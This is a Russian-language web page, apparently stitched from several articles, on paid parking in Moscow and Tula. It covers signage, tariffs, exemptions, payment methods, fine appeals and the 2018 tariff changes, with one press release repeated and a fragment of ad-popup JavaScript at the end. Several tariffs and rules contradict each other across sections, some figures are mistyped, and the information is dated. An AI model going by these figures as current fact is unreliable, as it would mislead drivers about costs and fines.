Правила пользования платными парковками

Правила пользования платной парковкой

В нашем мире, основанном на рыночных отношениях, за всё нужно платить, в том числе и за то, что паркуешь машину на специально отведённой стоянке. В многолюдных мегаполисах машин стало так много, что для их стоянки не хватает свободных мест, поэтому власти стали выделять для них специальные площадки, где автовладельцам можно за плату безбоязненно оставить свою машину на любой период времени. Однако нужно знать, как оплатить парковку вовремя, чтобы не получить штрафы за неоплаченную стоянку.

Чтобы дисциплинировать водителей и пополнить городскую казну московские власти в 2015 году ввели штрафы за неоплаченную парковки. При этом вся столичная территория разделена на зоны платной и бесплатной парковки. Первая отличается специальным обустройством и оборудованием, разметкой стояночных мест, наличием паркоматов – автоматов для приёма платежей. Границы платной зоны стоянки обозначаются предупреждающим знаком или табличкой. Однако, несмотря на это, многие водители, особенно приезжие из других регионов, по привычке забывают оплатить стоянку.

Знак платной парковки

По Правилам возле каждой парковочной площадки, предназначенной для стоянки автомобилей, устанавливается дорожный информационный знак 6.4 «Парковка», представляющий собой букву «Р» (Parking) на синем фоне. О том, что данная парковочная площадка является платной, говорит укреплённая ниже табличка 8.8 «Платные услуги», которая изображается в виде трёх монет номиналом 10, 15 и 20. Если дополнительная табличка под знаком «Р» отсутствует, следовательно, стоянка бесплатная. Таким образом, знак платной парковки представляет собой сочетание знака 6.4 с табличкой 8.8.

Кроме того, границы зоны платной стоянки обозначаются предупредительными щитами или таблоидами с соответствующими надписями о въезде в зону или выезде из зоны платной стоянки. Если въезд в зону платной стоянки обозначается сочетанием знаков 6.4 и 8.8, то выезд из него обозначается этими же знаками, но перечёркнутыми по диагонали тремя параллельными наклонными линиями.

Рекомендуется также обращать внимание на дорожную разметку, на платных площадках размечено каждое стояночное место косыми или прямыми полосами. Следует иметь в виду, что ставить машину в конечном секторе, ограниченном завершающим площадку полукругом, запрещается, так как она будет создавать помеху для выезжающих с поперечной улицы автомобилей.

Стоимость платной парковки и льготы, действующие в Москве

Стоимость парковки автомобиля на платных стоянках в различных городах разная и определяется решением местных властей. В Москве за парковку машины в платной зоне взимается 80 рублей за каждый час в районе, охватываемом Бульварным кольцом и 60 рублей/час на территории между Бульварным и Садовым кольцом.

Однако, если не оплатить парковку, то это грозит штрафом в 2500 рублей, а также эвакуацией автомобиля, что обойдется владельцу в 5000 рублей.

Но, как и во всех постановлениях властей, здесь также существуют исключения. В зоне платной парковки можно парковать машину бесплатно в следующих случаях:

  • если время стоянки не превышает 15 минут;
  • если парковать машину во внутреннем дворе или придомовых территориях, на которые не распространяется действие постановления о платных стоянках;
  • если владелец машины является участником ВОВ или относится к приравненной к ним категории людей, инвалидом или представителем многодетной семьи. Водители, попадающие в эту категорию льготников, должны ежегодно оформлять соответствующее разрешение в многофункциональном центре Москвы по предоставлению госуслуг. При этом инвалиды или ветераны могут бесплатно парковать машину только в отведённых для них стояночных местах, обозначенных соответствующим знаком;
  • если автомобиль является служебным транспортом экстренных служб;
  • граждане, проживающие на этих территориях, могут бесплатно парковать машину на платной стоянке на ночь с 20.00 вечера до 8.00 утра. Чтобы парковаться в дневное время этой категории граждан можно приобрести в МФЦ льготный годовой абонемент стоимостью 3000 рублей. На каждую квартиру можно оформить только 2 соглашения, которые действуют только в своей парковочной зоне. Это правило не зависит от количества собственников или проживающих в квартире людей.

Оформить их можно в ближайшем отделении МФЦ. Действие разрешения может временно прекращаться, если его владелец накопил три и более задолженностей по погашению штрафных постановлений за любые виды нарушений ПДД.

С 1 ноября 2016 года в Москве вступает в действие постановление о продление срока действия резидентных парковочных разрешений. Согласно этому постановлению гражданин может сам выбрать на какой срок он продлит действие резидентного парковочного разрешения. Если раньше это был обязательно год, то с 1 ноября можно будет оформить разрешение на год, два года или три, по выбору.
Плата за резидентное разрешение на парковку остается прежней — три тысячи рублей в год. Ее можно вносить частями, раз в год, а можно оплатить, например, сразу за три года.

Видео: Платная парковка в Москве или как избежать штрафов

Кто может оштрафовать за неоплаченную парковку?

Все виды нарушений, связанные с неправильной стоянкой и способами парковки автомашин выявляются инспекторами ГИБДД и Моспаркинга. Кроме того, по всей зоне платной парковки патрулируют специальные автомобили, оборудованные видеокамерами, которые производят запись номеров всех припаркованных машин и автоматически сверяют их в базе данных по оплате парковок. При выявлении номера машины, стоянка которой не оплачена, на её владельца оформляется постановление о штрафе за неоплаченную стоянку в сумме 2500 рублей и высылается по почте в его адрес. Обжаловать штраф за парковку нужно в ту инстанцию, от которой прибыло постановление о его наложении не позднее 10 суток с момента получения письма. Погасить штраф нужно в течение 60 суток.

Как оплатить парковку?

Существует несколько способов оплаты за стоянку:

1. Оплата через паркомат

Автоматические терминалы, принимающие оплату за стоянку машин, называются паркоматами. Паркоматы принимают к оплате только банковские или парковочные карты, наличными деньгами расплатиться в паркомате нельзя.

Порядок действий для выполнения платёжной операции выглядит следующим образом:

  1. на мониторе выбирается функция «Оплата парковки»;
  2. вводится номер автомашины, по требуемому формату;
  3. подтверждается номер парковочной зоны, где припаркован автомобиль;
  4. вводится продолжительность стоянки в часах;
  5. прикладывается расчётная карта к считывающему устройству (вкладывается в картоприёмник), дождаться окончания расчёта и получить чек

Аппарат автоматически рассчитывает стоимость парковки с учётом действующего тарифа для данной зоны и времени стоянки по 15-минутной тарификации.

В паркомате важно правильно ввести номер парковочной зоны, которые, как правило, указаны на щитах рядом с местом стоянки. После окончания финансовой операции все сведения автоматически передаются на центральный сервер в единую базу данных по учёту оплаты парковки.

Паркоматы обычно устанавливаются на каждой платной стоянке, и они удобны в пользовании. Однако их недостатком является возможность невыдачи квитанции (чека) о проведённой оплате по окончании бумажной чековой ленты внутри аппарата. Если при расчёте банковской картой подтвердить финансовую операцию можно в банке, то при оплате парковочной карточкой подтверждение платежа уже невозможно.

2. Оплата парковки при помощи SMS-сообщения

В Москве сотовые операторы предоставляют возможность производства расчётов за стоянку машин посредством SMS. Для активации, продления и прекращения услуги нужно выполнить следующие операции:

  1. Следует отправить по номеру 7757 кодированное сообщение в виде — номер стоянки*номер машины*время стоянки в часах (от 1 до 24), например, 1010*А444ММ111*8.
  2. Продление парковки, для чего нужно по указанному выше номеру отправить сообщение, состоящее из латинской буквы Х и продлеваемого времени в часах, например, Х4.
  3. Досрочное прекращение стоянки, для чего по номеру 7757 следует отправить простое сообщение в виде буквы С или S. Тогда сумма остатка неиспользованного времени стоянки возвращается обратно на парковочный счёт владельца машины.

Последняя операция позволяет сэкономить средства за счёт поминутной тарификации. Напомним, что первые 15 минут парковки бесплатны, а тарификация происходит с точностью до 15 минут. Поэтому можно поступить следующим образом:

  • например, водитель паркует машину в 9.00, а отправляет СМС об оплате стоянки в 9.13, указывая время пребывания в 60 минут, при котором срок парковки истекает в 10.15;
  • далее он забирает машину со стоянки досрочно в 10.12 и тут же отправляет СМС о прекращении парковки, за счёт чего средства за остаток времени в 13 минут возвращаются обратно на его счёт;
  • таким образом, машина фактически простояла на парковке 60 минут, а списано со счёта водителя только за 30 минут.

Видео: Как оплатить парковку в центре Москвы?

3. Оплата через Интернет с помощью мобильной программы

Чтобы иметь возможность оплачивать стоянку через Интернет нужно сначала установить на смартфон специальное приложение под названием «Парковки Москвы». Далее следует выполнить следующие действия:

  • осуществить регистрацию в приложении посредством отправки СМС в виде слова PIN по номеру 7757 и получить личный кабинет;
  • после получения на телефон ответного сообщения с паролем нужно осуществить вход в кабинет, указав логин (номер телефона) и пароль в соответствующих окнах;
  • пополнить баланс парковочного счёта;
  • выбрать опцию «Припарковаться», при этом начинается автоматический отсчёт времени парковки и списание средств со счёта;
  • выбрать опцию с треугольником для продления стоянки;
  • выбрать опцию с квадратом для закрытия парковки;
  • выбрать опцию «Штрафы» для своевременного выяснения информации о наличии непогашенного штрафа за неоплату стоянки.

4. Оплата на Qiwi-терминалах

Терминалы Qiwi располагаются во многих супермаркетах, торговых центрах и принимают плату наличными, для чего нужно выбирать: «Оплата услуг – Госпошлины – Московский паркинг», записать номер парковочной зоны и время парковки, внести требуемую сумму наличными. При этом услуги системы терминалов стоят 2% от вносимой суммы.

Как в Москве обжаловать штраф за парковку

Для обжалования постановления о штрафе законом предоставляется 10-дневный срок с момента его получения. Если срок обжалования пропущен по уважительной причине, то можно его восстановить по ходатайству. При обоснованном обжаловании можно не только отменить штрафное постановление за парковку, но и вернуть затраты на эвакуацию. Для того, чтобы вернуть деньги за эвакуацию нужно обратиться с заявлением в АМПП. Если постановление выносилось инспектором ГИБДД, то понадобится копия постановления о прекращении производства по делу об административном правонарушении. Деньги должны вернуть в течение восьми рабочих дней.

Образец ходатайства о восстановлении пропущенного срока обжалования постановления об административном правонарушении.

Существует несколько способов обжалования:

  • позвонив в АМПП по телефону 8(495) 988-30-59 с 10.00 до 19.00 в рабочие дни;
  • отправив жалобу на электронную почту zhaloba@mskampp.ru, parq@dt.mos.ru или в адрес Моспаркинга – ул. Скаковая, 19;
  • по телефону «горячей линии» 8 (495) 539–22–99 Единого колл-центра по эвакуации машин;
  • прибыв лично в офис Моспаркинга по указанному выше адресу.

К жалобе желательно приложить копии следующих документов:

  • штрафного постановления;
  • квитанции об оплате стоянки;
  • квитанции о резидентской плате или покупке льготного абонемента;

Образец жалобы для обжалования штрафа за парковку

Жалоба должна рассматриваться должностным лицом АМПП в срок не более 10 суток со дня её получения. Результат рассмотрения жалобы отправляется заявителю по почте не позднее 3-х суток после принятия решения и оформления соответствующего постановления. Если не получили ответ в течение этого времени, то нужно жаловаться в прокуратуру.

Правила пользования платными парковками

В Москве изменятся правила пользования платными парковками, исходя из загруженности улиц и приоритетного права использования парковок местными жителями (резидентами). На основе рекомендаций Российского экономического университета им. Плеханова разработаны новые правила пользования городскими парковками и дифференциации тарифов по признаку загруженности улиц. Нововведения не затронут владельцев парковочных разрешений и льготников и вводятся точечно на конкретных улицах. После изменений в центре Москвы освободится 15-20% парковочных мест. Соответствующее постановление принято Правительством Москвы. Изменения вступят в силу с 15 декабря 2018 года.

Для решения проблемы перегруженности улиц и парковок в городе был определён комплексный подход и точечное изменение правил и тарификации для более детального регулирования трафика с учётом интересов местных жителей.

Так, почти 25% уровня загруженности парковок сегодня создают автомобили, припаркованные без оплаты в течение отведённых 15 бесплатных минут. Такие автомобили создают дополнительный трафик, из-за чего страдают другие водители, которые не могут найти парковку. При этом 98% автомобилистов оплачивают парковку с помощью мобильного приложения или СМС в течение нескольких минут – в основном это владельцы личных автомобилей. Время бесплатной парковки теперь составит 5 минут.

Для 5% парковочных мест Москвы изменятся тарифы на парковку. Между Садовым и Третьим транспортным кольцом, а также за ним стоимость парковки в 40 и 60 рублей в час сохранится. Изменения произойдут на улицах внутри Садового кольца и лишь на нескольких точках у ТТК, где наблюдается сильная загруженность. При этом стоимость меняется только днём с 8:00 до 21:00, ночью тариф остаётся прежним. Просим водителей внимательнее смотреть на знаки и таблички, которые будут обновлены до 15 декабря и будут внесены соответствующие изменения в приложение по оплате парковок.

Тариф на парковку сформирован не в зависимости от зон, а от конкретной загрузки улиц. Минимальная стоимость парковки в центре составит 80 рублей в час — это улицы между Садовым и Бульварным кольцами. Парковка с дифференцированным тарифом — 50 рублей за первые 30 минут, затем 150 рублей в час — на более загруженных улицах Садового кольца. На улицах внутри Бульварного кольца тарифы составят 100 и 200 рублей в час.

Лишь на 1,9% улиц города будет установлен максимальный тариф — 380 рублей. Это улицы возле Москва-Сити, Тверской, Арбата и Патриарших прудов, а также Петровка, Неглинная, Романов переулок и другие. Также на этих улицах парковка в воскресенье станет платной. Просим автовладельцев обращать особое внимание на знаки. При этом в дни государственных праздников даже на этих улицах автомобили можно будет по-прежнему оставить бесплатно. Для местных жителей (резидентов) – ничего не меняется.

Благодаря этим мерам местные жители и автомобилисты, приезжающие ненадолго в центр, смогут найти место для автомобиля на улице или оставить машину на подземной парковке, на которых, как правило, нет дефицита парковочных мест.

Для жителей центральных районов города, которые неоднократно просили Департамент транспорта создать больше парковочных мест только для них, будет организовано 76 мест, доступных только для резидентов – например на улицах: Садовническая, Чаянова, Сергея Радонежского, Богословском переулке и др.

Кроме того, для водителей, которые не нарушают правила парковки, в мобильном приложении будут доступны такие полезные функции, как возможность продления парковочной сессии после ее завершения, замена неверного номера автомобиля или парковочной зоны до 23:59 текущего дня.

Из-за изменения часовой оплаты парковки меняется размер платы в течение одного месяца или одного года:

— 37 тысяч рублей в месяц и 370 тысяч рублей в год на всех платных городских парковках, расположенных на территории, ограниченной Третьим транспортным кольцом, и на Третьем транспортном кольце, включая его внутреннюю и внешнюю стороны, а также за внешней стороной Третьего транспортного кольца.

— 30 тысяч рублей в месяц или 300 тысяч рублей в год на платных городских парковках, расположенных на территории от внешней стороны Бульварного кольца до Третьего транспортного кольца и на Третьем транспортном кольце, включая его внутреннюю и внешнюю стороны.

«Мы понимаем, что часть изменений вряд ли понравятся всем, однако необходимо найти баланс между интересами местных жителей и теми, кто приезжает в сложные для паркования места в городе. Мы вынуждены подойти более детально к регулированию тарифов и правил и изменить работу городского парковочного пространства, опираясь на экспертные исследования и просьбы жителей. Это решение проблем, с которыми ежедневно сталкиваются местные жители (резиденты)», — заявили в пресс-службе Департамента транспорта.

Платные парковки, которые действуют в Москве с 2012 года — это эффективный способ решения проблемы дефицитного уличного пространства в городе. Так, благодаря им в 2 раза сократился средний срок прибытия скорой помощи, МЧС и пожарных расчётов на вызов (с 20 минут в 2010 году до 8 минут в 2017 году) и уменьшилось время стоянки с 6 часов до 1 часа 20 минут.

С вводом платной парковки в городе ликвидирована «хаотичная парковка», в 3,5 раза выросла оборачиваемость парковочных мест, создана безопасная и благоприятная среда для пешеходов, городского транспорта и автомобилистов. Кроме того, сокращение «блуждающего» трафика, создаваемого водителями, находящимися в поисках свободного места, позволяет уменьшать перепробеги транспорта и интенсивность движения, снижать количество загрязняющих выбросов и общий уровень шума городских улиц.

Приоритет в работе платной парковки в столице — это, безусловно, интересы местных жителей. Мировые специалисты в области транспорта неоднократно отмечали, что у Москвы нет другого выхода – платное парковочное пространство развивать необходимо, и это – самая мягкая регулирующая мера из возможных.

Напоминаем, что получить любую информацию, касающуюся столичного парковочного пространства, можно в контакт-центре «Московский транспорт» по телефону: 8 (495) 539-54-54 (3210 с мобильного).

Правила платной парковки в Москве

За последние годы количество транспортных средств в мегаполисах увеличилось в несколько раз. Исключением не стала и столица России. Дорожная инфраструктура города не была предусмотрена для такого количества машин. Поэтому власти внесли изменения в правила платной парковки в Москве. Это позволит решить проблему, с которой сталкиваются водители в поисках свободных мест стоянок.

О чем должны быть осведомлены владельцы личного транспорта? Какую сумму придется выложить за место размещения авто, и каким способом его можно оплачивать? Об этом и пойдет речь в статье.

Стоимость парковки в Москве

Районы, в которых водители могут оставлять авто на платных стоянках, утверждены постановлением правительства Москвы. В нем прописаны правила, зоны мест и порядок оплаты парковки. Ознакомиться с полным списком мест размещения транспорта можно в постановлении №1 о «Территориальных зонах организации платной городской стояки».

Цены проводятся по утвержденным тарифам. Об изменениях указано на сайте правительства столицы.

  1. Остановки в местах улиц, имеющих максимальную загруженность (район Садового кольца). Оплата зависит от времени суток. С 8.00 утра до 20.00 часов вечера введены дифференцированные тарифы. Это означает, что с каждым часом цена увеличивается. Сначала сумма составляет 60 рублей, затем возрастает до 100. Остановка в районе Бульварного кольца, обойдется в 50 руб., через 30 минут стоимость будет составлять 150 р. за один час.
  2. Парковка на улицах Третьего транспортного кольца. Цены фиксированные – в час 60 рублей.

Внимание! Узнать о стоимости водители смогут на специальном дорожном знаке, который имеется на всех платных стоянках. Знаки располагаются возле паркоматов.

Как совершить оплату

Для удобства водителей предусмотрено несколько способов оплаты. Выбирать можно наиболее удобный:

  • воспользоваться паркоматами (оплата с помощью банковских или парковочных карт);
  • с парковочных счетов (водителю достаточно скачать приложение на смартфон «Парковки Москвы»);
  • оплатить услугу парковочными абонементами (бывают годовые, месячные).

Правила парковки в Москве на платных парковках имеют исключения, при которых ставить машины можно бесплатно.

  1. Для тех, кто совершил оплату, согласно пунктов 3.2-3.3 Постановления правительства и поставил транспорт в промежуток времени с 8.00 до 20.00.
  2. Имеющим права на бесплатные места в столице России.
  3. При наличии оплаченных резидентских соглашений.
  4. Для сотрудников оперативных служб (Скорой помощи, пожарников, спасательно-аварийной, полиции, следственных органов)
  5. Инвалидам, при наличии удостоверения – в месте, специально обозначенном знаками и дорожными разметками.
  6. Участникам Великой отечественной войны, бывшим заключенным концлагерей.
  7. Многодетным родителям.
  8. Двухколесным транспортным средствам.

Полезная информация. После того, как место автомобилем занято, заплатить за услугу необходимо на протяжении 15 минут. Когда оплаченное время вышло, вы обязаны выехать со стоянки через 10 минут.

Как можно сэкономить?

Всем, кто приобретают парковочные абонементы сроком на 30 дней или 12 месяцев, предоставляется существенная скидка. Цены отличаются, в зависимости от районов столицы:

  • от границ города до внешней стороны Садового кольца – 150 тысяч в год или 15 тыс. в месяц;
  • от границ Москвы до Бульварного кольца – 200 0000 за 12 месяцев или 20 тыс. в мес.;
  • в любых зонах дорожно-транспортных улиц – 300 рублей за год и 30 тысяч за 30 дней.

Жителям мегаполиса предоставлено право ставить транспортные средства без оплаты в местах муниципальных районов проживания. С 20 часов вечера до 8 утра. Чтобы резидент получил такое право, он должен оформить специальное разрешение, сроком действия на три года. При этом оплатить право на бесплатную стоянку можно как по частям, так и полностью. При несвоевременной оплате частями положенной суммы продлевается разрешение на две недели. Принцип действия – на 1 помещение не более двух разрешений.

Оплата стоянок в столице по праздничным и выходным дням

С 2018 года в постановление Правительства внесены изменения (номер 906-ПП). В нем прописано, что автолюбители могут использовать парковочные места бесплатно в выходные и праздничные дни. Правило касается всех категорий граждан. Оставлять автомобиль разрешается бесплатно на сутки.

Правила оплаты парковки в Москве – нормы и оборудование

Платные зоны размещения реулируются несколькими регламентами, приложениями. Это необходимо для выполнения контроля за своевременной оплатой.

  1. Приложение территориальной зоны.
  2. Правила оборудования платных стоянок и размещение на них машин.
  3. Административные нормы на право размещения транспорта бесплатно для определенной категории граждан.
  4. Регламенты, предусматривающие льготы.
  5. Приложение о временном размещении автомобилей, которые ставятся на стоянках в аренду.

Площадки в Москве, предназначенные для платной парковки, должны быть оборудованы соответственно. Места – четко обозначены дорожными разметками. Стоянки не должны портить внешнего облика столицы, а быть объектами благоустройства. Не мешать пропускным способностям на загруженных улицах мегаполиса. Зоны размещения автомобилей являются частью автодорог, могут примыкать к эстакадам, обочинам, частям дороги, мостам, тротуарам. Не запрещено размещение под мостом, эстакадой. Для удобства автолюбителей устанавливаются соответствующие дорожные указатели. Все места на стоянках поделены с учетом того, что там может разместиться свободно машина.

Платные парковки в Москве стали выходом из сложившейся ситуации. Они позволили избежать хаоса на улицах перенаселенной столицы, упорядочили дорожное движение. Пользователи, в свою очередь, оценили такие зоны, а также способы оплаты за пользование платными стоянками. За всеми изменениями владельцы машин могут следить на соответствующих порталах столицы России.

Остались вопросы?

Проконсультируйтесь у юриста (бесплатно, круглосуточно, без выходных):

8 (499) 938-42-45 — Москва и Московская обл.

8 (812) 425-64-57 — Санкт-Петербург и Лен. обл.

ГУП «Мосгортранс»

В Москве изменятся правила пользования платными парковками, исходя из загруженности улиц и приоритетного права использования парковок местными жителями (резидентами). На основе рекомендаций Российского экономического университета им. Плеханова разработаны новые правила пользования городскими парковками и дифференциации тарифов по признаку загруженности улиц. Нововведения не затронут владельцев парковочных разрешений и льготников и вводятся точечно на конкретных улицах. После изменений в центре Москвы освободится 15-20% парковочных мест. Соответствующее постановление принято Правительством Москвы. Изменения вступят в силу с 15 декабря 2018 года.

Для решения проблемы перегруженности улиц и парковок в городе был определён комплексный подход и точечное изменение правил и тарификации для более детального регулирования трафика с учётом интересов местных жителей.

Так, почти 25% уровня загруженности парковок сегодня создают автомобили, припаркованные без оплаты в течение отведённых 15 бесплатных минут. Такие автомобили создают дополнительный трафик, из-за чего страдают другие водители, которые не могут найти парковку. При этом 98% автомобилистов оплачивают парковку с помощью мобильного приложения или СМС в течение нескольких минут – в основном это владельцы личных автомобилей. Время бесплатной парковки теперь составит 5 минут.

Для 5% парковочных мест Москвы изменятся тарифы на парковку. Между Садовым и Третьим транспортным кольцом, а также за ним стоимость парковки в 40 и 60 рублей в час сохранится. Изменения произойдут на улицах внутри Садового кольца и лишь на нескольких точках у ТТК, где наблюдается сильная загруженность. При этом стоимость меняется только днём с 8:00 до 21:00, ночью тариф остаётся прежним. Просим водителей внимательнее смотреть на знаки и таблички, которые будут обновлены до 15 декабря и будут внесены соответствующие изменения в приложение по оплате парковок.

Тариф на парковку сформирован не в зависимости от зон, а от конкретной загрузки улиц. Минимальная стоимость парковки в центре составит 80 рублей в час – это улицы между Садовым и Бульварным кольцами. Парковка с дифференцированным тарифом – 50 рублей за первые 30 минут, затем 150 рублей в час – на более загруженных улицах Садового кольца. На улицах внутри Бульварного кольца тарифы составят 100 и 200 рублей в час.

Лишь на 1,9% улиц города будет установлен максимальный тариф – 380 рублей. Это улицы возле Москва-Сити, Тверской, Арбата и Патриарших прудов, а также Петровка, Неглинная, Романов переулок и другие. Также на этих улицах парковка в воскресенье станет платной. Просим автовладельцев обращать особое внимание на знаки. При этом в дни государственных праздников даже на этих улицах автомобили можно будет по-прежнему оставить бесплатно. Для местных жителей (резидентов) – ничего не меняется.

Благодаря этим мерам местные жители и автомобилисты, приезжающие ненадолго в центр, смогут найти место для автомобиля на улице, или оставить машину на подземной парковке, на которых, как правило, нет дефицита паковочных мест.

Для жителей центральных районов города, которые неоднократно просили Департамент транспорта создать больше парковочных мест только для них, будет организовано 76 мест, доступных только для резидентов – например, на улицах: Садовническая, Чаянова, Сергея Радонежского, Богословском, Приютинском переулках и др.

Кроме того, для водителей, которые не нарушают правила парковки, в мобильном приложении будут доступны такие полезные функции как: возможность продления парковочной сессии после ее завершения, замена неверного номера автомобиля или парковочной зоны до конца текущего дня 23:59.

Из-за изменения часовой оплаты парковки меняется размер платы в течение одного месяца или одного года:

– 37 тысяч рублей в месяц и 370 тысяч рублей в год на всех платных городских парковках, расположенных на территории, ограниченной Третьим транспортным кольцом, и на Третьем транспортном кольце, включая его внутреннюю и внешнюю стороны, а также за внешней стороной Третьего транспортного кольца.

– 30 тысяч рублей в месяц или 300 тысяч рублей в год на платных городских парковках, расположенных на территории от внешней стороны Бульварного кольца до Третьего транспортного кольца и на Третьем транспортном кольце, включая его внутреннюю и внешнюю стороны.

«Мы понимаем, что часть изменений вряд ли понравятся всем, однако необходимо найти баланс между интересами местных жителей и теми, кто приезжает в сложные для паркования места в городе. Мы вынуждены подойти более детально к регулированию тарифов и правил и изменить работу городского парковочного пространства, опираясь на экспертные исследования и просьбы жителей. Это решение проблем, с которыми ежедневно сталкиваются местные жители (резиденты)», – заявили в пресс-службе Департамента транспорта.

Платные парковки, которые действуют в Москве 2012 года – это эффективный способ решения проблемы дефицитного уличного пространства в городе. Так, благодаря им в 2 раза сократился средний срок прибытия Скорой помощи, МЧС и пожарных расчётов на вызов (с 20 минут в 2010 году до 8 минут в 2017 году) и уменьшилось время стоянки с 6 часов до 1 часа 20 минут.

С вводом платной парковки в городе ликвидирована «хаотичная парковка», в 3,5 раза выросла оборачиваемость парковочных мест, создана безопасная и благоприятная среда для пешеходов, городского транспорта и автомобилистов. Кроме того, сокращение «блуждающего» трафика, создаваемого водителями, находящимися в поисках свободного места, позволяет уменьшать перепробеги транспорта и интенсивность движения, снижать количество загрязняющих выбросов и общий уровень шума городских улиц.

Приоритет в работе платной парковки в столице – это, безусловно, интересы местных жителей. Мировые специалисты в области транспорта неоднократно отмечали, что у Москвы нет другого выхода – платное парковочное пространство развивать необходимо, и это – самая мягкая регулирующая мера из возможных.

Правила пользования парковками

Настоящие Правила определяют процедуру пользования платными городскими парковками, расположенными на автомобильных дорогах общего пользования местного значения муниципального образования город Тула, единые правила эксплуатации и пользования городскими платными парковками, расположенными на земельных участках из земель, находящихся в собственности или аренде муниципального образования город Тула в соответствии с федеральными законами, законами Тульской области, нормативными правовыми актами муниципального образования город Тула, а также права и обязанности работников оператора парковки и водителей автотранспортных средств, пользующихся городскими платными парковками.
Правила обязательны для выполнения всеми лицами, находящимися на территории городской парковки.
  • К территории платной городской парковки относится весь участок улично-дорожной сети, обозначенный соответствующими дорожными знаками и разметкой, предусмотренными Правилами дорожного движения, утвержденными постановлением Правительства РФ от 23.10.1993 № 1090.
  • Размещение транспортных средств на платной городской парковке осуществляется за плату ежедневно с 9-00 до 19-00 за исключением выходных и официально объявленных праздничных дней.
  • Пользователь платной городской парковки обязан в течение 30 минут с момента въезда на парковочное место осуществить оплату за размещение транспортного средства на платной городской парковке (за исключением случаев, когда транспортное средство может быть размещено бесплатно), либо покинуть платную городскую парковку
Внимание! Правила пользования парковкой особого типа, расположенной по адресу улица Союзная/улица Благовещенская:
— первые 3 (три) часа – бесплатно;
— каждый последующий час – 100 рублей (оплата производится до окончания третьего часа бесплатной парковки);
— способы оплаты указаны на информационных табличках на территории парковки.
Пользователь платной парковки — водитель транспортного средства, который въехал на территорию платной городской парковки и разместил на ней транспортное средство.

Пользователи городских платных парковок обязаны:

— размещать автотранспортные средства на платной городской парковке в строгом соответствии с линиями разметки и требованиями дорожных знаков;

— при постановке транспортного средства на платную городскую парковку оплатить предполагаемое время размещения транспортного средства с помощью абонемента или в безналичной форме способами оплаты, установленными Оператором парковки;

— соблюдать чистоту и порядок на территории платной городской парковки.

Пользователям запрещается:

— резервировать парковочные места и создавать иные препятствия к свободному размещению транспортных средств на парковочных местах;

— размещать на парковочном месте, предназначенном для транспортных средств определенного вида, если это предусмотрено соответствующими дорожными знаками, транспортное средство иного вида.

На территории платной городской парковки запрещено:

— хранить какие-либо предметы, кроме автотранспортных средств, в том числе легковоспламеняющиеся и взрывоопасные вещества;

— курить и распивать спиртные напитки;

— осуществлять мойку автомобиля;

— осуществлять ремонт автомобиля (за исключением работ, вызванных необходимостью устранения неисправностей, при которых запрещается эксплуатация транспортных средств в соответствии Правилами дорожного движения, утвержденными постановлением Правительства РФ от 23.10.1993 №1090).

*Размещение транспортных средств на платной городской парковке может быть временно (не более 2 часов в сутки) ограничено в связи с необходимостью уборки территории платной городской парковки. В случае ограничения размещения транспортных средств на платной городской парковке выставляются временные дорожные знаки, информирующие пользователей о введенных ограничениях.

* На каждой платной городской парковке выделяется не менее 10 % (но не менее одного места) для парковки транспортных средств инвалидов I и II групп, а также законных представителей ребенка-инвалида и иных лиц, перевозящих инвалидов I и II групп или детей-инвалидов.

* В случае, если размещенное на платной городской парковке транспортное средство создает помехи для других участников движения или Пользователей платной городской парковкой, Инспектор парковки обязан вызвать сотрудников полиции и ходатайствовать об использовании автомобиля-эвакуатора для перемещения данного транспортного средства.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
